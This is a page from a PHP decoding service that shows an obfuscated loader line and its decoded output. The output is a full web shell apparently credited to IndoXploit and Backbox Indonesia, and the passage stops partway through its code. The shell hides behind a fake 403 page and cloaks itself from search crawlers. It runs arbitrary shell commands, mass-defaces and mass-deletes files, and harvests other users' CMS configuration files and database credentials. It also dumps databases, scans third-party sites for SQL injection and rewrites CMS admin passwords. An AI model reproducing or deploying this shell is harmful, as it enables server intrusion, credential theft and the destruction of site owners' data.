Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval(gzinflate(base64_decode('7X1pV9vI0vBn7jn3P3Q03AgmxhtLEsDOGDCBhC0Ysuf4yJZsK..
Decoded Output download
$auth_pass = "a7c4172eb7c2e054fa35adf2029f9bc5"; //what are you doing man??
$color = "#00ff00";
$sec = 1;
$default_action = 'FilesMan';
@define('SELF_PATH', __FILE__);
if (strpos($_SERVER['HTTP_USER_AGENT'], 'Google') !== false) {
header('HTTP/1.0 404 Not Found');
exit;
}
@session_start();
@error_reporting(0);
@ini_set('error_log', NULL);
@ini_set('log_errors', 0);
@ini_set('max_execution_time', 0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('VERSION', '2.1');
if (get_magic_quotes_gpc()) {
function stripslashes_array($array) {
return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
}
$_POST = stripslashes_array($_POST);
}
function printLogin() {
?>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access on this server.</p>
<hr>
<address>Apache Server at <?=$_SERVER['HTTP_HOST'] ?> Port 80</address>
<style>
input { margin:0;background-color:#fff;border:1px solid #fff; }
</style>
<center>
<form method=post>
<input type=password name=pass>
</form></center>
<?php
exit;
}
if ($sec == 1 && !isset($_SESSION[md5($_SERVER['HTTP_HOST']) ])) if (empty($auth_pass) || (isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass))) $_SESSION[md5($_SERVER['HTTP_HOST']) ] = true;
else printLogin();
/*------------------ Mr.HaurgeulisX196 EveryWhere ------------*/
if (!empty($_SERVER['HTTP_USER_AGENT'])) {
$userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
if (preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
header('HTTP/1.0 404 Not Found');
exit;
}
}
?>
<html>
<head>
<title>Backbox Indonesia Web Shell v1.0</title>
<meta name='author' content='IndoXploit'>
<meta charset="UTF-8">
<style type='text/css'>
@import url();
html {
background: #000000;
color: #006fff;
font-family: 'Ubuntu';
font-size: 13px;
width: 100%;
}
li {
display: inline;
margin: 5px;
padding: 5px;
}
table, th, td {
border-collapse:collapse;
font-family: Tahoma, Geneva, sans-serif;
background: transparent;
font-family: 'Ubuntu';
font-size: 13px;
}
.table_home, .th_home, .td_home {
border: 1px solid #006fff;
}
th {
padding: 10px;
}
a {
color: #006fff;
text-decoration: none;
}
a:hover {
color: red;
text-decoration: underline;
}
b {
color: red;
}
input[type=text], input[type=password],input[type=submit] {
background: transparent;
color: #006fff;
border: 1px solid #006fff;
margin: 5px auto;
padding-left: 5px;
font-family: 'Ubuntu';
font-size: 13px;
}
textarea {
border: 1px solid #006fff;
width: 70%;
height: 200px;
padding-left: 5px;
margin: 10px auto;
resize: none;
background: transparent;
color: #006fff;
font-family: 'Ubuntu';
font-size: 13px;
}
</style>
</head>
<body onLoad="document.getElementById('cmd').focus();">
<div class="main">
<!-- head info start here -->
<div class="head_info">
<table ><tr>
<td><table class="b374k_tbl"><tr><td><a href="?"><span class="b374k"><img src="http://i.imgur.com/BqqJHGp.jpg"/></span></a></td></tr>
<tr><td><b><font color=red>Backbox Medan Team Shell v1.0</font></b></td></tr>
</table></td>
<td><?php echo $buff; ?>
</td>
</tr></table>
</div>
<?php
###############################################################################
// Thanks buat Orang-orang yg membantu dalam proses pembuatan shell ini.
// Shell ini tidak sepenuhnya 100% Coding manual, ada beberapa function dan tools kita ambil dari shell yang sudah ada.
// Tapi Selebihnya, itu hasil kreasi IndoXploit sendiri.
// Tanpa kalian kita tidak akan BESAR seperti sekarang.
// Greetz: All Member IndoXploit. & all my friends.
###############################################################################
function w($dir,$perm) {
if(!is_writable($dir)) {
return "<font color=red>".$perm."</font>";
} else {
return "<font color=blue>".$perm."</font>";
}
}
function exe($cmd) {
if(function_exists('system')) {
@ob_start();
@system($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
} elseif(function_exists('exec')) {
@exec($cmd,$results);
$buff = "";
foreach($results as $result) {
$buff .= $result;
} return $buff;
} elseif(function_exists('passthru')) {
@ob_start();
@passthru($cmd);
$buff = @ob_get_contents();
@ob_end_clean();
return $buff;
} elseif(function_exists('shell_exec')) {
$buff = @shell_exec($cmd);
return $buff;
}
}
function perms($file){
$perms = fileperms($file);
if (($perms & 0xC000) == 0xC000) {
// Socket
$info = 's';
} elseif (($perms & 0xA000) == 0xA000) {
// Symbolic Link
$info = 'l';
} elseif (($perms & 0x8000) == 0x8000) {
// Regular
$info = '-';
} elseif (($perms & 0x6000) == 0x6000) {
// Block special
$info = 'b';
} elseif (($perms & 0x4000) == 0x4000) {
// Directory
$info = 'd';
} elseif (($perms & 0x2000) == 0x2000) {
// Character special
$info = 'c';
} elseif (($perms & 0x1000) == 0x1000) {
// FIFO pipe
$info = 'p';
} else {
// Unknown
$info = 'u';
}
// Owner
$info .= (($perms & 0x0100) ? 'r' : '-');
$info .= (($perms & 0x0080) ? 'w' : '-');
$info .= (($perms & 0x0040) ?
(($perms & 0x0800) ? 's' : 'x' ) :
(($perms & 0x0800) ? 'S' : '-'));
// Group
$info .= (($perms & 0x0020) ? 'r' : '-');
$info .= (($perms & 0x0010) ? 'w' : '-');
$info .= (($perms & 0x0008) ?
(($perms & 0x0400) ? 's' : 'x' ) :
(($perms & 0x0400) ? 'S' : '-'));
// World
$info .= (($perms & 0x0004) ? 'r' : '-');
$info .= (($perms & 0x0002) ? 'w' : '-');
$info .= (($perms & 0x0001) ?
(($perms & 0x0200) ? 't' : 'x' ) :
(($perms & 0x0200) ? 'T' : '-'));
return $info;
}
function hdd($s) {
if($s >= 1073741824)
return sprintf('%1.2f',$s / 1073741824 ).' GB';
elseif($s >= 1048576)
return sprintf('%1.2f',$s / 1048576 ) .' MB';
elseif($s >= 1024)
return sprintf('%1.2f',$s / 1024 ) .' KB';
else
return $s .' B';
}
function ambilKata($param, $kata1, $kata2){
if(strpos($param, $kata1) === FALSE) return FALSE;
if(strpos($param, $kata2) === FALSE) return FALSE;
$start = strpos($param, $kata1) + strlen($kata1);
$end = strpos($param, $kata2, $start);
$return = substr($param, $start, $end - $start);
return $return;
}
if(get_magic_quotes_gpc()) {
function idx_ss($array) {
return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
}
$_POST = idx_ss($_POST);
}
error_reporting(0);
error_log(0);
@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
if(isset($_GET['dir'])) {
$dir = $_GET['dir'];
chdir($_GET['dir']);
} else {
$dir = getcwd();
}
$dir = str_replace("\","/",$dir);
$scdir = explode("/", $dir);
$sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=green>ON</font>" : "<font color=red>OFF</font>";
$ds = @ini_get("disable_functions");
$mysql = (function_exists('mysql_connect')) ? "<font color=blue>ON</font>" : "<font color=purple>OFF</font>";
$curl = (function_exists('curl_version')) ? "<font color=blue>ON</font>" : "<font color=purple>OFF</font>";
$wget = (exe('wget --help')) ? "<font color=blue>ON</font>" : "<font color=purple>OFF</font>";
$perl = (exe('perl --help')) ? "<font color=blue>ON</font>" : "<font color=purple>OFF</font>";
$python = (exe('python --help')) ? "<font color=blue>ON</font>" : "<font color=purple>OFF</font>";
$show_ds = (!empty($ds)) ? "<font color=green>$ds</font>" : "<font color=blue>NONE</font>";
if(!function_exists('posix_getegid')) {
$user = @get_current_user();
$uid = @getmyuid();
$gid = @getmygid();
$group = "?";
} else {
$uid = @posix_getpwuid(posix_geteuid());
$gid = @posix_getgrgid(posix_getegid());
$user = $uid['name'];
$uid = $uid['uid'];
$group = $gid['name'];
$gid = $gid['gid'];
}
echo "System: <font color=blue>".php_uname()."</font><br>";
echo "User: <font color=blue>".$user."</font> (".$uid.") Group: <font color=blue>".$group."</font> (".$gid.")<br>";
echo "Server IP: <font color=blue>".gethostbyname($_SERVER['HTTP_HOST'])."</font> | Your IP: <font color=blue>".$_SERVER['REMOTE_ADDR']."</font><br>";
echo "HDD: <font color=blue>".hdd(disk_free_space("/"))."</font> / <font color=blue>".hdd(disk_total_space("/"))."</font><br>";
echo "Safe Mode: $sm<br>";
echo "Disable Functions: $show_ds<br>";
echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
echo "Current DIR: ";
foreach($scdir as $c_dir => $cdir) {
echo "<a href='?dir=";
for($i = 0; $i <= $c_dir; $i++) {
echo $scdir[$i];
if($i != $c_dir) {
echo "/";
}
}
echo "'>$cdir</a>/";
}
echo "<hr>";
echo "<center>";
echo "<ul>";
echo "<li>[ <a href='?'>Home</a> ]</li>";
echo "<li>[ <a href='?dir=$dir&do=upload'>Upload</a> ]</li>";
echo "<li>[ <a href='?dir=$dir&do=cmd'>Command</a> ]</li>";
echo "<li>[ <a href='?dir=$dir&do=mass_deface'>Mass Deface</a> ]</li>";
echo "<li>[ <a href='?dir=$dir&do=mass_delete'>Mass Delete</a> ]</li>";
echo "<li>[ <a href='?dir=$dir&do=config'>Config</a> ]</li>";
echo "<li>[ <a href='?dir=$dir&do=jumping'>Jumping</a> ]</li>";
echo "<li>[ <a href='?dir=$dir&do=cms'>CMS Detector</a> ]</li>";
echo "<li>[ <a href='?dir=$dir&do=dump'>Database Dump</a> ]</li>";
echo "<li>[ <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> ]</li>";
echo "<li>[ <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> ]</li>";
echo "<li>[ <a href='?dir=$dir&do=zoneh'>Zone-H</a> ]</li>";
echo "<li>[ <a href='?dir=$dir&do=cgi'>CGI Telnet</a> ]</li>";
echo "<li>[ <a href='?dir=$dir&do=adminer'>Adminer</a> ]</li>";
echo "<li>[ <a href='?dir=$dir&do=fake_root'>Fake Root</a> ]</li><br>";
echo "<li>[ <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> ]</li>";
echo "<li>[ <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> ]</li>";
echo "<li>[ <a href='?dir=$dir&do=auto_dwp'>WordPress Auto Deface</a> ]</li>";
echo "<li>[ <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a> ]</li>";
echo "<li>[ <a href='?dir=$dir&do=joomscan'>Joomla Server Scanner</a> ]</li>";
echo "<li>[ <a href='?dir=$dir&do=sqli'>Sqli Scanner</a> ]</li>";
echo "<li>[ <a href='?dir=$dir&do=string'>Decode & Encode Script</a> ]</li>";
echo "<li>[ <a href='?dir=$dir&do=tentang'>Tentang</a> ]</li>";
echo "</ul>";
echo "</center>";
echo "<hr>";
////////////////////////////////////////////////////////////////
if($_GET['do'] == 'upload') {
echo "<center>";
if($_POST['upload']) {
if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
$act = "<font color=blue>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
} else {
$act = "<font color=purple>failed to upload file</font>";
}
}
echo "Upload File: [ ".w($dir,"Writeable")." ]<form method='post' enctype='multipart/form-data'><input type='file' name='ix_file'><input type='submit' value='upload' name='upload'></form>";
echo $act;
echo "</center>";
////////////////////////////////////////////////////////////////
} elseif($_GET['do'] == 'cmd') {
echo "<form method='post'>
<font style='text-decoration: underline;'>".$user."@".gethostbyname($_SERVER['HTTP_HOST']).":~# </font>
<input type='text' size='30' height='10' name='cmd'><input type='submit' name='do_cmd' value='>>'>
</form>";
if($_POST['do_cmd']) {
echo "<pre>".exe($_POST['cmd'])."</pre>";
}
////////////////////////////////////////////////////////////////
} elseif($_GET['do'] == 'mass_deface') {
function sabun_massal($dir,$namafile,$isi_script) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$lokasi = $dirc.'/'.$namafile;
if($dirb === '.') {
file_put_contents($lokasi, $isi_script);
} elseif($dirb === '..') {
file_put_contents($lokasi, $isi_script);
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
echo "[<font color=blue>DONE</font>] $lokasi<br>";
file_put_contents($lokasi, $isi_script);
$idx = sabun_massal($dirc,$namafile,$isi_script);
}
}
}
}
}
}
if($_POST['start']) {
echo "<div style='margin: 5px auto; padding: 5px'>";
sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']);
echo "</div>";
} else {
echo "<center>";
echo "<form method='post'>
<font style='text-decoration: underline;'>Folder:</font><br>
<input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
<font style='text-decoration: underline;'>Filename:</font><br>
<input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
<font style='text-decoration: underline;'>Index File:</font><br>
<textarea name='script' style='width: 450px; height: 200px;'>Hacked by IndoXploit</textarea><br>
<input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
</form></center>";
}
////////////////////////////////////////////////////////////////
} elseif($_GET['do'] == 'mass_delete') {
function hapus_massal($dir,$namafile) {
if(is_writable($dir)) {
$dira = scandir($dir);
foreach($dira as $dirb) {
$dirc = "$dir/$dirb";
$lokasi = $dirc.'/'.$namafile;
if($dirb === '.') {
if(file_exists("$dir/$namafile")) {
unlink("$dir/$namafile");
}
} elseif($dirb === '..') {
if(file_exists("".dirname($dir)."/$namafile")) {
unlink("".dirname($dir)."/$namafile");
}
} else {
if(is_dir($dirc)) {
if(is_writable($dirc)) {
if(file_exists($lokasi)) {
echo "[<font color=blue>DELETED</font>] $lokasi<br>";
unlink($lokasi);
$idx = hapus_massal($dirc,$namafile);
}
}
}
}
}
}
}
if($_POST['start']) {
echo "<div style='margin: 5px auto; padding: 5px'>";
hapus_massal($_POST['d_dir'], $_POST['d_file']);
echo "</div>";
} else {
echo "<center>";
echo "<form method='post'>
<font style='text-decoration: underline;'>Folder:</font><br>
<input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
<font style='text-decoration: underline;'>Filename:</font><br>
<input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
<input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
</form></center>";
}
////////////////////////////////////////////////////////////////
} elseif($_GET['do'] == 'config') {
$etc = fopen("/etc/passwd", "r");
$idx = mkdir("idx_config", 0777);
$isi_htc = "Options all
Require None
Satisfy Any";
$htc = fopen("idx_config/.htaccess","w");
fwrite($htc, $isi_htc);
while($passwd = fgets($etc)) {
if($passwd == "" || !$etc) {
echo "<font color=purple>Can't read /etc/passwd</font>";
} else {
preg_match_all('/(.*?):x:/', $passwd, $user_config);
foreach($user_config[1] as $user_idx) {
$user_config_dir = "/home/$user_idx/public_html/";
if(is_readable($user_config_dir)) {
$grab_config = array(
"/home/$user_idx/.my.cnf" => "cpanel",
"/home/$user_idx/.accesshash" => "WHM-accesshash",
"/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb",
"/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia",
"/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
"/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS",
"/home/$user_idx/public_html/whm/configuration.php" => "WHMCS",
"/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",
"/home/$user_idx/public_html/forum/config.php" => "phpBB",
"/home/$user_idx/public_html/sites/default/settings.php" => "Drupal",
"/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop",
"/home/$user_idx/public_html/app/etc/local.xml" => "Magento",
"/home/$user_idx/public_html/joomla/configuration.php" => "Joomla",
"/home/$user_idx/public_html/configuration.php" => "Joomla",
"/home/$user_idx/public_html/wp/wp-config.php" => "WordPress",
"/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress",
"/home/$user_idx/public_html/wp-config.php" => "WordPress",
"/home/$user_idx/public_html/admin/config.php" => "OpenCart",
"/home/$user_idx/public_html/slconfig.php" => "Sitelok",
"/home/$user_idx/public_html/application/config/database.php" => "Ellislab");
foreach($grab_config as $config => $nama_config) {
$ambil_config = file_get_contents($config);
if($ambil_config == '') {
} else {
$file_config = fopen("idx_config/$user_idx-$nama_config.txt","w");
fputs($file_config,$ambil_config);
}
}
}
}
}
}
echo "<center><a href='?dir=$dir/idx_config'><font color=blue>Done</font></a></center>";
////////////////////////////////////////////////////////////////
} elseif($_GET['do'] == 'jumping') {
$i = 0;
echo "<pre><div class='margin: 5px auto;'>";
$etc = fopen("/etc/passwd", "r");
while($passwd = fgets($etc)) {
if($passwd == '' || !$etc) {
echo "<font color=purple>Can't read /etc/passwd</font>";
} else {
preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
foreach($user_jumping[1] as $user_idx_jump) {
$user_jumping_dir = "/home/$user_idx_jump/public_html";
if(is_readable($user_jumping_dir)) {
$i++;
$jrw = "[<font color=blue>R</font>] <a href='?dir=$user_jumping_dir'><font color=red>$user_jumping_dir</font></a>";
if(is_writable($user_jumping_dir)) {
$jrw = "[<font color=blue>RW</font>] <a href='?dir=$user_jumping_dir'><font color=red>$user_jumping_dir</font></a>";
}
echo $jrw;
$domain_jump = file_get_contents("/etc/named.conf");
if($domain_jump == '') {
echo " => ( <font color=purple>gabisa ambil nama domain nya</font> )<br>";
} else {
preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
foreach($domains_jump[1] as $dj) {
$user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
$user_jumping_url = $user_jumping_url['name'];
if($user_jumping_url == $user_idx_jump) {
echo " => ( <u>$dj</u> )<br>";
break;
}
}
}
}
}
}
}
if($i == 0) {
} else {
echo "<br>Total ada ".$i." Kamar di ".gethostbyname($_SERVER['HTTP_HOST'])."";
}
echo "</div></pre>";
////////////////////////////////////////////////////////////////
} elseif($_GET['do'] == 'tentang') {
{
?>
<form action="?y=<?php echo $pwd; ?>&x=about" method="post">
<center><br><br><img src='http://i.imgur.com/BqqJHGp.jpg'>
<br><font size="5">Terima Kasih Kepada:<br><font size="3" color="#006fff">Tim Indoxploit karena telah memberi izin untuk merecode shell ini,
Shell ini hanyalah sebuah hasil recode dengan beberapa function dan tools kita ambil dari shell yang sudah ada seperti dari shell X'1N73CT. Shell hasil recode
ini kudedikasikan untuk Backbox Linux Indonesia.
Keep Calm And Act!, Use Your Brain And Control The System.
Greetz: IndoXploit Team, Backbox Linux Indonesia, ISD-Team. & all my friends specially Backbox Medan Team.</font></font></center><center>
<marquee direction="up" scrollamount="2" bgcolor="" width="250" height="40"><center>
<p><b><font size="3" color="#006fff"><br><br>
</font></b></p>
</center>
</marquee></center><br><br><br>
<?php
}
////////////////////////////////////////////////////////////////
} elseif($_GET['do'] == 'dump') {
{
?>
<form action="?y=<?php echo $pwd; ?>&x=dump" method="post">
<?php
echo $head.'<p align="center">';
echo '
<table width=371 class=tabnet >
<tr><th colspan="2">Database Dump</th></tr>
<tr>
<td>Server </td>
<td><input class="inputz" type=text name=server size=52></td></tr><tr>
<td>Username</td>
<td><input class="inputz" type=text name=username size=52></td></tr><tr>
<td>Password</td>
<td><input class="inputz" type=text name=password size=52></td></tr><tr>
<td>DataBase Name</td>
<td><input class="inputz" type=text name=dbname size=52></td></tr>
<tr>
<td>DB Type </td>
<td><form method=post action="'.$me.'">
<select class="inputz" name=method>
<option value="gzip">Gzip</option>
<option value="sql">Sql</option>
</select>
<input class="inputzbut" type=submit value=" Dump! " ></td></tr>
</form></center></table>';
if ($_POST['username'] && $_POST['dbname'] && $_POST['method']){
$date = date("Y-m-d");
$dbserver = $_POST['server'];
$dbuser = $_POST['username'];
$dbpass = $_POST['password'];
$dbname = $_POST['dbname'];
$file = "Dump-$dbname-$date";
$method = $_POST['method'];
if ($method=='sql'){
$file="Dump-$dbname-$date.sql";
$fp=fopen($file,"w");
}else{
$file="Dump-$dbname-$date.sql.gz";
$fp = gzopen($file,"w");
}
function write($data) {
global $fp;
if ($_POST['method']=='ssql'){
fwrite($fp,$data);
}else{
gzwrite($fp, $data);
}}
mysql_connect ($dbserver, $dbuser, $dbpass);
mysql_select_db($dbname);
$tables = mysql_query ("SHOW TABLES");
while ($i = mysql_fetch_array($tables)) {
$i = $i['Tables_in_'.$dbname];
$create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
write($create['Create Table'].";
");
$sql = mysql_query ("SELECT * FROM ".$i);
if (mysql_num_rows($sql)) {
while ($row = mysql_fetch_row($sql)) {
foreach ($row as $j => $k) {
$row[$j] = "'".mysql_escape_string($k)."'";
}
write("INSERT INTO $i VALUES(".implode(",", $row).");
");
}
}
}
if ($method=='ssql'){
fclose ($fp);
}else{
gzclose($fp);}
header("Content-Disposition: attachment; filename=" . $file);
header("Content-Type: application/download");
header("Content-Length: " . filesize($file));
flush();
$fp = fopen($file, "r");
while (!feof($fp))
{
echo fread($fp, 65536);
flush();
}
fclose($fp);
}
}
////////////////////////////////////////////////////////////////
} elseif($_GET['do'] == 'joomscan') {
{
?>
<form action="?y=<?php echo $pwd; ?>&x=jss" method="post">
<?php
echo '
<br><br><br><p align="center"><b><font size="3">Enter Targeting IP</font></b></p><br>
<form method="POST">
<p align="center"><input type="text" class="inputz" name="site" size="65"><input class="inputzbut" type="submit" value="Scan"></p>
</form><center>
';
@set_time_limit(0);
@error_reporting(E_ALL | E_NOTICE);
function check_exploit($comxx){
$link ="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$comxx&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=";
$result = @file_get_contents($link);
if (eregi("No results",$result)) {
echo"<td>Not Found</td><td><a href='http://www.google.com/#hl=en&q=download+$comxx+joomla+extension'>Download</a></td></tr>";
}else{
echo"<td><a href='$link'>Found</a></td><td><=</td></tr>";
}
}
function check_com($url){
$source = @file_get_contents($url);
preg_match_all('{option,(.*?)/}i',$source,$f);
preg_match_all('{option=(.*?)(&|&|")}i',$source,$f2);
preg_match_all('{/components/(.*?)/}i',$source,$f3);
$arz=array_merge($f2[1],$f[1],$f3[1]);
$coms=array();
foreach(array_unique($arz) as $x){
$coms[]=$x;
}
foreach($coms as $comm){
echo "<tr><td>$comm</td>";
check_exploit($comm);
}
}
function sec($site){
preg_match_all('{http://(.*?)(/index.php)}siU',$site, $sites);
if(eregi("www",$sites[0][0])){
return $site=str_replace("index.php","",$sites[0][0]);
}else{
return $site=str_replace("http://","http://www.",str_replace("index.php","",$sites[0][0]));
}}
$npages = 50000;
if ($_POST)
{
$ip = trim(strip_tags($_POST['site']));
$npage = 1;
$allLinks = array();
while($npage <= $npages)
{
$x=@file_get_contents('http://www.bing.com/search?q=ip%3A' . $ip . '+index.php?option=com&first=' . $npage);
if ($x)
{
preg_match_all('(<div class="sb_tlst">.*<h3>.*<a href="(.*)".*>(.*)</a>.*</h3>.*</div>siU', $x, $findlink);
foreach ($findlink[1] as $fl)
$allLinks[]=sec($fl);
$npage = $npage + 10;
if (preg_match('(first=' . $npage . '&)siU', $x, $linksuiv) == 0)
break;
}
else
break;
}
$allDmns = array();
foreach ($allLinks as $kk => $vv){
$allDmns[] = $vv;
}
echo'<table border="1" width=\"80%\" align=\"center\">
<tr><td width=\"30%\"><b>Server IP : </b></td><td><b>'.$ip.'</b></td></tr>
<tr><td width=\"30%\"><b>Sites Found : </b></td><td><b>'.count(array_unique($allDmns)).'</b></td></tr>
</table>';
echo "<br><br>";
echo'<table border="1" width="80%" align=\"center\">';
foreach(array_unique($allDmns) as $h3h3){
echo'<tr id=new><td><b><a href='.$h3h3.'>'.$h3h3.'</a></b></td><td><b>Exploit-db</b></td><td><b>challenge of Exploiting ..!</b></td></tr>';
check_com($h3h3);
}
echo"</table>";
}
}
////////////////////////////////////////////////////////////////
} elseif($_GET['do'] == 'string') {
{$text = $_POST['code'];
?>
<center><br><br><b>Decode & Encode Script</b><br><br>
<form method="post"><br><br><br>
<textarea class='inputz' cols=20 rows=5 name="code"></textarea><br><br>
<select class='inputz' size="1" name="ope">
<option value="base64">Base64</option>
<option value="gzinflate">str_rot13 - gzinflate - base64</option>
<option value="str">str_rot13 - gzinflate - str_rot13 - base64</option>
</select> <input class='inputzbut' type='submit' name='submit' value='Encrypt'>
<input class='inputzbut' type='submit' name='submits' value='Decrypt'>
</form>
<?php
$submit = $_POST['submit'];
if (isset($submit)){
$op = $_POST["ope"];
switch ($op) {case 'base64': $codi=base64_encode($text);
break;case 'str' : $codi=(base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
break;case 'gzinflate' : $codi=base64_encode(gzdeflate(str_rot13($text)));
break;default:break;}}
$submit = $_POST['submits'];
if (isset($submit)){
$op = $_POST["ope"];
switch ($op) {case 'base64': $codi=base64_decode($text);
break;case 'str' : $codi=str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
break;case 'gzinflate' : $codi=str_rot13(gzinflate(base64_decode($text)));
break;default:break;}}
echo '<textarea cols=10 rows=10 class="inputz" readonly>'.$codi.'</textarea></center><BR><BR>';
}
////////////////////////////////////////////////////////////////
} elseif($_GET['do'] == 'sqli') {
{
?>
<form action="?y=<?php echo $pwd; ?>&x=sqli-scanner" method="post">
<?php
echo '<br><br><center><form method="post" action=""><b><font color="green">Dork : </font></b> <input class="inputz" type="text" value="" name="dork" style="color:#006fff;background-color:#000000" size="20"/><input class="inputzbut" type="submit" style="color:#006fff;background-color:#000000" name="scan" value="Scan"></form></center>';
ob_start();
set_time_limit(0);
if (isset($_POST['scan'])) {
$browser = $_SERVER['HTTP_USER_AGENT'];
$first = "startgoogle.startpagina.nl/index.php?q=";
$sec = "&start=";
$reg = '/<p class="g"><a href="(.*)" target="_self" onclick="/';
for($id=0 ; $id<=30; $id++){
$page=$id*10;
$dork=urlencode($_POST['dork']);
$url = $first.$dork.$sec.$page;
$curl = curl_init($url);
curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($curl,CURLOPT_USERAGENT,'$browser)');
$result = curl_exec($curl);
curl_close($curl);
preg_match_all($reg,$result,$matches);
}
foreach($matches[1] as $site){
$url = preg_replace("/=/", "='", $site);
$curl=curl_init();
curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
curl_setopt($curl,CURLOPT_URL,$url);
curl_setopt($curl,CURLOPT_USERAGENT,'$browser)');
curl_setopt($curl,CURLOPT_TIMEOUT,'5');
$GET=curl_exec($curl);
if (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch​_row()|SELECT *
FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$GET)) {
echo '<center><b><font color="#E10000">Found : </font><a href="'.$url.'" target="_blank">'.$url.'</a><font color=#FF0000> <-- SQLI Vuln
Found..</font></b></center>';
ob_flush();flush();
}else{
echo '<center><font color="#FFFFFF"><b>'.$url.'</b></font><font color="#0FFF16"> <-- Not Vuln</font></center>';
ob_flush();flush();
}
ob_flush();flush();
}
ob_flush();flush();
}
ob_flush();flush();
}
////////////////////////////////////////////////////////////////
} elseif($_GET['do'] == 'cms') {
{
?>
<form action="?y=<?php echo $pwd; ?>&x=cms_detect" method="post">
<br><br><br><br><center><b><font size=4><font color=green>CMS Detector</font></font></b></center><br><br>
<?php
if(!file_exists('pee.tmp')){
@fopen('pee.tmp', 'w');
echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
echo'<tr><td><center><b><font color=red>SITE</font></b></center></td><td><center><b><font color=green>USER</font></b></center></td><td><center><b><font color=blue>CMS</font></b></center></td></table>';
$p = 0;
if(is_readable("/var/named")){
$list = scandir("/var/named");
$current_dir = posix_getcwd();
$dir = explode("/",$current_dir);
foreach($list as $domain){
if(strpos($domain,".db"))
{
$domain = str_replace('.db','',$domain);
$owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
error_reporting(0);
$link = $pageURL.'pee/'.$owner['name'];
cms_add($link,$domain,$owner['name'],"WordPress");
cms_add($link,$domain,$owner['name'],"Joomla");
cms_add($link,$domain,$owner['name'],"vBulletin");
cms_add($link,$domain,$owner['name'],"WHMCS");
cms_add($link,$domain,$owner['name'],"PhpBB");
cms_add($link,$domain,$owner['name'],"MyBB");
cms_add($link,$domain,$owner['name'],"IPB");
cms_add($link,$domain,$owner['name'],"SMF");
cms_add($link,$domain,$owner['name'],"Drupal");
cms_add($link,$domain,$owner['name'],"e107");
cms_add($link,$domain,$owner['name'],"Seditio");
cms_add($link,$domain,$owner['name'],"osCommerce");
}
}
}
}else{
echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
echo'<tr><td><center><b><font color=red>SITE</font></b></center></td><td><center><b><font color=green>USER</font></b></center></td><td><center><b><font color=blue>CMS</font></b></center></td></table>';
$content = file_get_contents($pageURL.'pee.tmp');
echo $content;
}
}
////////////////////////////////////////////////////////////////
} elseif($_GET['do'] == 'auto_edit_user') {
if($_POST['hajar']) {
if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
echo "username atau password harus lebih dari 6 karakter";
} else {
$user_baru = $_POST['user_baru'];
$pass_baru = md5($_POST['pass_baru']);
$conf = $_POST['config_dir'];
$scan_conf = scandir($conf);
foreach($scan_conf as $file_conf) {
if(!is_file("$conf/$file_conf")) continue;
$config = file_get_contents("$conf/$file_conf");
if(preg_match("/JConfig|joomla/",$config)) {
$dbhost = ambilkata($config,"host = '","'");
$dbuser = ambilkata($config,"user = '","'");
$dbpass = ambilkata($config,"password = '","'");
$dbname = ambilkata($config,"db = '","'");
$dbprefix = ambilkata($config,"dbprefix = '","'");
$prefix = $dbprefix."users";
